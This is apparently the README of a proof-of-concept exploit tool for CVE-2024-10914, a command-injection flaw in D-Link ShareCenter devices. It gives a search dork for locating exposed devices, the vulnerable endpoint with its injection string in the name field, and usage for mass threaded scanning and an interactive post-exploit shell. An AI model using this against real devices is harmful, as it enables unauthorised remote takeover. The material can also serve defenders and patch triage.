This script is a proof-of-concept (PoC) exploit for CVE-2024-10914, a remote code execution vulnerability in certain D-Link devices. The script identifies and exploits vulnerable devices to execute arbitrary commands.
Note: This script should only be used for educational purposes or in authorized environments. Unauthorized exploitation of this vulnerability may be illegal and unethical.
Finding Targets
To find potential targets, use Fofa (similar to Shodan.io):
Fofa Dork: app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"- Vulnerability Check: The script can check if a target is vulnerable to CVE-2024-10914.
- Exploit: Exploit the vulnerability by sending payloads to gain remote command execution.
- Interactive Shell: After exploitation, an interactive shell is started for executing further commands.
- Multi-target Scanning: Scan multiple targets from a file using multiple threads for faster vulnerability detection.
- Python 3.x
requests(for HTTP requests)alive-progress(for progress bars)prompt_toolkit(for the interactive shell)argparse(for handling command-line arguments)
To install required libraries, use:
pip3 install -r requirements.txtusage: exploit.py [-h] [-u URL] [-f FILE] [-t THREADS] [-p PORT]
A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Single target IP to test (e.g., 192.168.1.1)
-f FILE, --file FILE File containing list of target IPs to scan
-t THREADS, --threads THREADS
Number of threads to use for scanning (default: 5)
-p PORT, --port PORT Port to target (default: 80)
- Check a Single Target:
python exploit.py -u 192.168.1.100 -p 80python exploit.py -f targets.txt -p 80 -t 10This script attempts to exploit a vulnerability in D-Link devices, specifically targeting the following
- Vulnerable Endpoint: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';{};'
- Payloads: Various system commands (id, uname -a, hostname, cat /proc/cpuinfo, etc.) The exploit is carried out by injecting system commands into the vulnerable endpoint, triggering the remote execution of arbitrary commands on the target device
This script is for educational purposes only. Do not use this script on systems or networks you do not have explicit permission to test.
The authors are not responsible for any misuse of this tool.
For more details, please refer to the official GitHub repository: https://github.com/ThemeHackers/CVE-2024-10914
If you find any issues or want to contribute, feel free to open an issue or submit a pull request on the GitHub repository.
This project is licensed under the MIT License - see the LICENSE file for details
MIT License
Copyright (c) 2024 ds_zct
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.